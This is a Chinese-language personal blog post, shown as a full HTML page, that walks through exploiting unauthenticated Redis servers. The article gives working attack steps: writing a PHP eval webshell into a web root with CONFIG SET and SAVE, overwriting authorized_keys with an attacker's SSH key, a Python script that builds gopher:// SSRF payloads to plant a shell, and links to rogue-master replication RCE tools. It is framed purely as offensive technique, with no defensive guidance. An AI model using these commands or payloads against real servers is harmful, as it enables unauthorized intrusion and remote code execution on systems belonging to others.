<!DOCTYPE html>
<html lang="zh-CN" color-mode="light">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <meta name="author" content="KaGty1" />
  <!-- Open Graph Description 简短摘要-->
  
  <!-- 用于搜索引擎的文章摘要 -->
  
  
  
  <title>
    
      浅谈Redis未授权攻击 
      
      
      |
    
     KaGty1 &#39;s Personal Blog
  </title>

  
    <link rel="apple-touch-icon" href="/images/kagty1.jpg">
    <link rel="icon" href="/images/kagty1.jpg">
  

  <!-- Raleway-Font -->
  <link href="https://fonts.googleapis.com/css?family=Raleway&display=swap" rel="stylesheet">

  <!-- hexo site css -->
  <link rel="stylesheet" href="/css/main.css" />
  <link rel="stylesheet" href="//at.alicdn.com/t/font_1886449_67xjft27j1l.css" />
  <!-- 代码块风格 -->
  

  <!-- jquery3.3.1 -->
  
    <script defer type="text/javascript" src="/plugins/jquery.min.js"></script>
  

  <!-- fancybox -->
  
    <link href="/plugins/jquery.fancybox.min.css" rel="stylesheet">
    <script defer type="text/javascript" src="/plugins/jquery.fancybox.min.js"></script>
  
  
<script src="/js/fancybox.js"></script>


  

  

  <script>
    var html = document.documentElement
    const colorMode = localStorage.getItem('color-mode')
    if (colorMode) {
      document.documentElement.setAttribute('color-mode', colorMode)
    }
  </script>
<meta name="generator" content="Hexo 7.3.0"></head>


  <body>
    <div id="app">
      <div class="header">
  <div class="avatar">
    <a href="/">
      <!-- 头像取消懒加载，添加no-lazy -->
      
        <img src="/images/kagty1.jpg" alt="">
      
    </a>
    <div class="nickname"><a href="/">kagty1</a></div>
  </div>
  <div class="navbar">
    <ul>
      
        <li class="nav-item" data-path="/">
          <a href="/">Home</a>
        </li>
      
        <li class="nav-item" data-path="/archives/">
          <a href="/archives/">Archives</a>
        </li>
      
        <li class="nav-item" data-path="/friends/">
          <a href="/friends/">Friends</a>
        </li>
      
    </ul>
  </div>
</div>


<script src="/js/activeNav.js"></script>



      <div class="flex-container">
        <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


  <!-- LaTex Display -->

  
    <script async type="text/javascript" src="/plugins/mathjax/tex-chtml.js"></script>
  
  <script>
    MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      }
    }
  </script>





  <!-- clipboard -->

  
    <script async type="text/javascript" src="/plugins/clipboard.min.js"></script>
  
  
<script src="/js/codeCopy.js"></script>







  

  

  

  
  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div class="container post-details" id="post-details">
    <div class="post-content">
      <div class="post-title">浅谈Redis未授权攻击</div>
      <div class="post-attach">
        <span class="post-pubtime">
          <i class="iconfont icon-updatetime mr-10" title="更新时间"></i>
          2025-02-03 14:05:16
        </span>
        
      </div>
      <div class="markdown-body">
        <h3 id="Redis未授权访问"><a href="#Redis未授权访问" class="headerlink" title="Redis未授权访问"></a>Redis未授权访问</h3><p>利用条件：</p>
<p>1、redis 绑定在 0.0.0.0:6379，且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略，直接暴露在公网。</p>
<p>2、没有设置密码认证（一般为空），可以免密码远程登录redis服务。</p>
<p>未授权连接 <code>redis-cli -h 101.xx.xx.xxx</code>，并使用 info命令列出受害机 redis服务信息</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250127191940868.png" alt="image-20250127191940868"></p>
<h3 id="Redis未授权-getshell"><a href="#Redis未授权-getshell" class="headerlink" title="Redis未授权 getshell"></a>Redis未授权 getshell</h3><p>利用 redis未授权写入 webshell实现 getshell。</p>
<p>利用前提：redis服务端存在 web服务器，且通过某种方式(phpinfo泄漏等)获得Web目录的根路径，且具有文件的读写权限，就可以利用 redis写入一句话木马 getshell。</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250127200309726.png" alt="image-20250127200309726"></p>
<p>1、将 redis工作目录修改至 Web根目录</p>
<p><code>config set dir /wwwroot/www/</code></p>
<p>2、将 redis的数据文件名称(dbfilename)设置为 shell.php</p>
<p><code>config set dbfilename shell.php</code></p>
<p>3、写入一句话木马shell</p>
<p><code>config set payload &quot;&lt;?php @eval($_POST[1]);?&gt;&quot;</code></p>
<p>4、保存</p>
<p><code>save</code></p>
<p>由此在网站根目录下写入一句话木马，使用蚁剑连接 <code>http://1xx.xx.xx.xxx/shell.php</code></p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250127200903951.png" alt="image-20250127200903951"></p>
<h3 id="利用-redis未授权写入-ssh公钥"><a href="#利用-redis未授权写入-ssh公钥" class="headerlink" title="利用 redis未授权写入 ssh公钥"></a>利用 redis未授权写入 ssh公钥</h3><p>首先需要了解 ssh公钥认证机制：</p>
<p>SSH 使用公钥认证来进行无密码登录。用户需要将自己的公钥添加到远程服务器的 <code>~/.ssh/authorized_keys</code> 文件中，服务器会通过公钥验证用户的身份。如果公钥匹配，就可以成功登录。</p>
<p>利用 <code>CONFIG SET</code> 命令更改 Redis 配置 Redis 允许通过 <code>CONFIG SET</code> 命令更改配置，攻击者可以将 <code>dir</code> 配置更改为目标主机的 <code>~/.ssh</code> 目录。这样，攻击者可以直接通过 <code>SET</code> 命令将数据写入该目录，覆盖 <code>authorized_keys</code> 文件，添加自己的 SSH 公钥。</p>
<p>首先在攻击机生成 ssh公钥并保存：</p>
<p><code>ssh-keygen -t rsa</code></p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250127204128882.png" alt="image-20250127204128882"></p>
<p>1、将 ssh公钥值写入到 redis键 pubKey中：</p>
<p><code>cat /Users/gehansheng/.ssh/id_rsa.pub | redis-cli -h 101.42.13.105 -x set pubKey</code></p>
<p><code>|</code>（管道符）：将 <code>cat</code> 命令的输出传递给后续的命令</p>
<p><code>-x</code>：表示从标准输入读取数据，并将数据作为值存储到 Redis。</p>
<p>2、将工作目录设置到 <code>/home/ubuntu/.ssh</code></p>
<p><code>config set dir /home/ubuntu/.ssh</code></p>
<p>3、将 redis的数据文件名称设置为 <code>authorized_keys</code>，这意味着 Redis 将数据存储在 <code>/root/.ssh/authorized_keys</code> 文件中，而不是默认的 <code>dump.rdb</code> 文件。</p>
<p><code>config set dbfilename authorized_keys</code></p>
<p>4、保存</p>
<p><code>save</code></p>
<p>但尝试使用 ssh免密连接时发现失败，查看写入的 authorized_keys文件，发现是由于公钥和 redis缓存中其他数据混合在一起导致的</p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250127211147836.png" alt="image-20250127211147836"></p>
<p>修改命令，添加换行符，防止数据混淆</p>
<p><code>(echo -e &quot;\n\n&quot;; cat /Users/gehansheng/.ssh/id_rsa.pub; echo -e &quot;\n\n&quot;) &gt; ~/Desktop/key.txt</code></p>
<p>正确添加公钥后，便可使用 ssh公钥免密登录</p>
<p><code>ssh 1xx.xx.xx.xxx</code></p>
<h3 id="配合-SSRF-getshell"><a href="#配合-SSRF-getshell" class="headerlink" title="配合 SSRF getshell"></a>配合 SSRF getshell</h3><p>当 redis服务绑定在 127.0.0.1时，只能从本地主机访问 redis服务端，此时无法从公网直接未授权访问并写入 shell了，但是可以利用 ssrf + gopher协议来写入 shell。</p>
<p>python脚本如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> urllib.parse</span><br><span class="line">protocol=<span class="string">&quot;gopher://&quot;</span>  <span class="comment"># 使用的协议 </span></span><br><span class="line">ip=<span class="string">&quot;127.0.0.1&quot;</span></span><br><span class="line">port=<span class="string">&quot;6379&quot;</span>   <span class="comment"># 目标redis的端口号 </span></span><br><span class="line">shell=<span class="string">&quot;\n\n&lt;?php phpinfo();?&gt;\n\n&quot;</span></span><br><span class="line">filename=<span class="string">&quot;shell.php&quot;</span>   <span class="comment"># shell的名字 </span></span><br><span class="line">path=<span class="string">&quot;/www/wwwroot&quot;</span>      <span class="comment"># 写入的路径</span></span><br><span class="line">passwd=<span class="string">&quot;&quot;</span>   <span class="comment"># 如果有密码 则填入</span></span><br><span class="line"><span class="comment"># 我们的恶意命令 </span></span><br><span class="line">cmd=[<span class="string">&quot;flushall&quot;</span>,</span><br><span class="line">     <span class="string">&quot;set 1 &#123;&#125;&quot;</span>.<span class="built_in">format</span>(shell.replace(<span class="string">&quot; &quot;</span>,<span class="string">&quot;$&#123;IFS&#125;&quot;</span>)),</span><br><span class="line">     <span class="string">&quot;config set dir &#123;&#125;&quot;</span>.<span class="built_in">format</span>(path),</span><br><span class="line">     <span class="string">&quot;config set dbfilename &#123;&#125;&quot;</span>.<span class="built_in">format</span>(filename),</span><br><span class="line">     <span class="string">&quot;save&quot;</span></span><br><span class="line">     ]</span><br><span class="line"><span class="keyword">if</span> passwd:</span><br><span class="line">    cmd.insert(<span class="number">0</span>,<span class="string">&quot;AUTH &#123;&#125;&quot;</span>.<span class="built_in">format</span>(passwd))</span><br><span class="line">payload=protocol+ip+<span class="string">&quot;:&quot;</span>+port+<span class="string">&quot;/_&quot;</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">redis_format</span>(<span class="params">arr</span>):</span><br><span class="line">    CRLF=<span class="string">&quot;\r\n&quot;</span></span><br><span class="line">    redis_arr = arr.split(<span class="string">&quot; &quot;</span>)</span><br><span class="line">    cmd=<span class="string">&quot;&quot;</span></span><br><span class="line">    cmd+=<span class="string">&quot;*&quot;</span>+<span class="built_in">str</span>(<span class="built_in">len</span>(redis_arr))</span><br><span class="line">    <span class="keyword">for</span> x <span class="keyword">in</span> redis_arr:</span><br><span class="line">        cmd+=CRLF+<span class="string">&quot;$&quot;</span>+<span class="built_in">str</span>(<span class="built_in">len</span>((x.replace(<span class="string">&quot;$&#123;IFS&#125;&quot;</span>,<span class="string">&quot; &quot;</span>))))+CRLF+x.replace(<span class="string">&quot;$&#123;IFS&#125;&quot;</span>,<span class="string">&quot; &quot;</span>)</span><br><span class="line">    cmd+=CRLF</span><br><span class="line">    <span class="keyword">return</span> cmd</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__==<span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    <span class="keyword">for</span> x <span class="keyword">in</span> cmd:</span><br><span class="line">        payload += urllib.parse.quote(redis_format(x))</span><br><span class="line">    <span class="built_in">print</span> (payload)</span><br><span class="line">    <span class="built_in">print</span> (<span class="string">&quot;二次url编码后的结果:\n&quot;</span> + urllib.parse.quote(payload))</span><br></pre></td></tr></table></figure>

<p>利用脚本生成 payload后打 ssrf即可。</p>
<p>![image-20250202165210627](<a target="_blank" rel="noopener" href="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250202165210627.png">https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250202165210627.png</a></p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250202165539678.png" alt="image-20250202165539678"></p>
<p><img src="https://img-1325537595.cos.ap-beijing.myqcloud.com/undefinedimage-20250202165636097.png" alt="image-20250202165636097"></p>
<h3 id="Redis主从复制-getshell"><a href="#Redis主从复制-getshell" class="headerlink" title="Redis主从复制 getshell"></a>Redis主从复制 getshell</h3><p><strong>主从复制原理：</strong></p>
<p>从节点 (slaver) 全量同步主节点 (Master) 的数据，同步过程中，主节点会生成一个RDB快照文件发送给从节点，从节点加载该RDB文件恢复数据。</p>
<p><strong>getshell关键点：</strong></p>
<p>从 Redis &gt;&#x3D; 4.0开始，主从复制的 RDB中可以包含模块(Module)的加载指令。如果攻击者伪装成主节点，向从节点发送包含恶意模块加载指令的RDB文件，从节点会自动加载并执行该模块。</p>
<p>Redis支持通过动态链接库(.so文件)来拓展功能，加载模块命令如下</p>
<p><code>module load /path/exp.so</code></p>
<p>自动化 RCE工具：</p>
<p><code>https://github.com/LoRexxar/redis-rogue-server</code></p>
<p>Exp.so payload:</p>
<p><code>https://github.com/RicterZ/RedisModules-ExecuteCommand</code></p>

      </div>
      
        <div class="prev-or-next">
          <div class="post-foot-next">
            
              <a href="/2025/01/24/%E6%B5%85%E8%B0%88Java%E4%B8%AD%E7%9A%84SSRF%E5%AE%A1%E8%AE%A1/" target="_self">
                <i class="iconfont icon-chevronleft"></i>
                <span>上一页</span>
              </a>
            
          </div>
          <div class="post-attach">
            <span class="post-pubtime">
              <i class="iconfont icon-updatetime mr-10" title="更新时间"></i>
              2025-02-03 14:05:16
            </span>
            
          </div>
          <div class="post-foot-prev">
            
              <a href="/2025/02/05/CC1%E9%93%BE%E5%88%86%E6%9E%90/" target="_self">
                <span>下一页</span>
                <i class="iconfont icon-chevronright"></i>
              </a>
            
          </div>
        </div>
      
    </div>
    
  <div id="btn-catalog" class="btn-catalog">
    <i class="iconfont icon-catalog"></i>
  </div>
  <div class="post-catalog hidden" id="catalog">
    <div class="title">目录</div>
    <div class="catalog-content">
      
        <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#Redis%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE"><span class="toc-text">Redis未授权访问</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Redis%E6%9C%AA%E6%8E%88%E6%9D%83-getshell"><span class="toc-text">Redis未授权 getshell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8-redis%E6%9C%AA%E6%8E%88%E6%9D%83%E5%86%99%E5%85%A5-ssh%E5%85%AC%E9%92%A5"><span class="toc-text">利用 redis未授权写入 ssh公钥</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%85%8D%E5%90%88-SSRF-getshell"><span class="toc-text">配合 SSRF getshell</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#Redis%E4%B8%BB%E4%BB%8E%E5%A4%8D%E5%88%B6-getshell"><span class="toc-text">Redis主从复制 getshell</span></a></li></ol>
      
    </div>
  </div>

  
<script src="/js/catalog.js"></script>




    
      <div class="comments-container">
        







      </div>
    
  </div>


        
<div class="footer">
  <div class="social">
    <ul>
      
        <li>
          
              <a title="github" target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">
                <i class="iconfont icon-github"></i>
              </a>
              
        </li>
        
    </ul>
  </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Copyright © 2025 Oranges</a>
        
    </div>
  
    
    <div class="footer-more">
      
        <a target="_blank" rel="noopener" href="https://github.com/zchengsite/hexo-theme-oranges">Theme by Oranges | Powered by Hexo</a>
        
    </div>
  
  
</div>

      </div>

      <div class="tools-bar">
        <div class="back-to-top tools-bar-item hidden">
  <a href="javascript: void(0)">
    <i class="iconfont icon-chevronup"></i>
  </a>
</div>


<script src="/js/backtotop.js"></script>



        
  <div class="search-icon tools-bar-item" id="search-icon">
    <a href="javascript: void(0)">
      <i class="iconfont icon-search"></i>
    </a>
  </div>

  <div class="search-overlay hidden">
    <div class="search-content" tabindex="0">
      <div class="search-title">
        <span class="search-icon-input">
          <a href="javascript: void(0)">
            <i class="iconfont icon-search"></i>
          </a>
        </span>
        
          <input type="text" class="search-input" id="search-input" placeholder="搜索...">
        
        <span class="search-close-icon" id="search-close-icon">
          <a href="javascript: void(0)">
            <i class="iconfont icon-close"></i>
          </a>
        </span>
      </div>
      <div class="search-result" id="search-result"></div>
    </div>
  </div>

  <script type="text/javascript">
    var inputArea = document.querySelector("#search-input")
    var searchOverlayArea = document.querySelector(".search-overlay")

    inputArea.onclick = function() {
      getSearchFile()
      this.onclick = null
    }

    inputArea.onkeydown = function() {
      if(event.keyCode == 13)
        return false
    }

    function openOrHideSearchContent() {
      let isHidden = searchOverlayArea.classList.contains('hidden')
      if (isHidden) {
        searchOverlayArea.classList.remove('hidden')
        document.body.classList.add('hidden')
        // inputArea.focus()
      } else {
        searchOverlayArea.classList.add('hidden')
        document.body.classList.remove('hidden')
      }
    }

    function blurSearchContent(e) {
      if (e.target === searchOverlayArea) {
        openOrHideSearchContent()
      }
    }

    document.querySelector("#search-icon").addEventListener("click", openOrHideSearchContent, false)
    document.querySelector("#search-close-icon").addEventListener("click", openOrHideSearchContent, false)
    searchOverlayArea.addEventListener("click", blurSearchContent, false)

    var searchFunc = function (path, search_id, content_id) {
      'use strict';
      var $input = document.getElementById(search_id);
      var $resultContent = document.getElementById(content_id);
      $resultContent.innerHTML = "<ul><span class='local-search-empty'>首次搜索，正在载入索引文件，请稍后……<span></ul>";
      $.ajax({
        // 0x01. load xml file
        url: path,
        dataType: "xml",
        success: function (xmlResponse) {
          // 0x02. parse xml file
          var datas = $("entry", xmlResponse).map(function () {
            return {
              title: $("title", this).text(),
              content: $("content", this).text(),
              url: $("url", this).text()
            };
          }).get();
          $resultContent.innerHTML = "";

          $input.addEventListener('input', function () {
            // 0x03. parse query to keywords list
            var str = '<ul class=\"search-result-list\">';
            var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
            $resultContent.innerHTML = "";
            if (this.value.trim().length <= 0) {
              return;
            }
            // 0x04. perform local searching
            datas.forEach(function (data) {
              var isMatch = true;
              var content_index = [];
              if (!data.title || data.title.trim() === '') {
                data.title = "Untitled";
              }
              var orig_data_title = data.title.trim();
              var data_title = orig_data_title.toLowerCase();
              var orig_data_content = data.content.trim().replace(/<[^>]+>/g, "");
              var data_content = orig_data_content.toLowerCase();
              var data_url = data.url;
              var index_title = -1;
              var index_content = -1;
              var first_occur = -1;
              // only match artiles with not empty contents
              if (data_content !== '') {
                keywords.forEach(function (keyword, i) {
                  index_title = data_title.indexOf(keyword);
                  index_content = data_content.indexOf(keyword);

                  if (index_title < 0 && index_content < 0) {
                    isMatch = false;
                  } else {
                    if (index_content < 0) {
                      index_content = 0;
                    }
                    if (i == 0) {
                      first_occur = index_content;
                    }
                    // content_index.push({index_content:index_content, keyword_len:keyword_len});
                  }
                });
              } else {
                isMatch = false;
              }
              // 0x05. show search results
              if (isMatch) {
                str += "<li><a href='" + data_url + "' class='search-result-title'>" + orig_data_title + "</a>";
                var content = orig_data_content;
                if (first_occur >= 0) {
                  // cut out 100 characters
                  var start = first_occur - 20;
                  var end = first_occur + 80;

                  if (start < 0) {
                    start = 0;
                  }

                  if (start == 0) {
                    end = 100;
                  }

                  if (end > content.length) {
                    end = content.length;
                  }

                  var match_content = content.substr(start, end);

                  // highlight all keywords
                  keywords.forEach(function (keyword) {
                    var regS = new RegExp(keyword, "gi");
                    match_content = match_content.replace(regS, "<span class=\"search-keyword\">" + keyword + "</span>");
                  });

                  str += "<p class=\"search-result-abstract\">" + match_content + "...</p>"
                }
                str += "</li>";
              }
            });
            str += "</ul>";
            if (str.indexOf('<li>') === -1) {
              return $resultContent.innerHTML = "<ul><span class='local-search-empty'>没有找到内容，请尝试更换检索词。<span></ul>";
            }
            $resultContent.innerHTML = str;
          });
        },
        error: function(xhr, status, error) {
          $resultContent.innerHTML = ""
          if (xhr.status === 404) {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>未找到search.xml文件，具体请参考：<a href='https://github.com/zchengsite/hexo-theme-oranges#configuration' target='_black'>configuration</a><span></ul>";
          } else {
            $resultContent.innerHTML = "<ul><span class='local-search-empty'>请求失败，尝试重新刷新页面或稍后重试。<span></ul>";
          }
        }
      });
      $(document).on('click', '#search-close-icon', function() {
        $('#search-input').val('');
        $('#search-result').html('');
      });
    }

    var getSearchFile = function() {
        var path = "/search.xml";
        searchFunc(path, 'search-input', 'search-result');
    }
  </script>




        
  <div class="tools-bar-item theme-icon" id="switch-color-scheme">
    <a href="javascript: void(0)">
      <i id="theme-icon" class="iconfont icon-moon"></i>
    </a>
  </div>

  
<script src="/js/colorscheme.js"></script>





        
  
    <div class="share-icon tools-bar-item">
      <a href="javascript: void(0)" id="share-icon">
        <i class="iconfont iconshare"></i>
      </a>
      <div class="share-content hidden">
        
          <a class="share-item" href="https://twitter.com/intent/tweet?text=' + %E6%B5%85%E8%B0%88Redis%E6%9C%AA%E6%8E%88%E6%9D%83%E6%94%BB%E5%87%BB + '&url=' + http%3A%2F%2Fkagty1.github.io%2F2025%2F01%2F27%2F%25E6%25B5%2585%25E8%25B0%2588Redis%25E6%259C%25AA%25E6%258E%2588%25E6%259D%2583%2F + '" target="_blank" title="Twitter">
            <i class="iconfont icon-twitter"></i>
          </a>
        
        
          <a class="share-item" href="https://www.facebook.com/sharer.php?u=http://kagty1.github.io/2025/01/27/%E6%B5%85%E8%B0%88Redis%E6%9C%AA%E6%8E%88%E6%9D%83/" target="_blank" title="Facebook">
            <i class="iconfont icon-facebooksquare"></i>
          </a>
        
      </div>
    </div>
  
  
<script src="/js/shares.js"></script>



      </div>
    </div>
  </body>
</html>
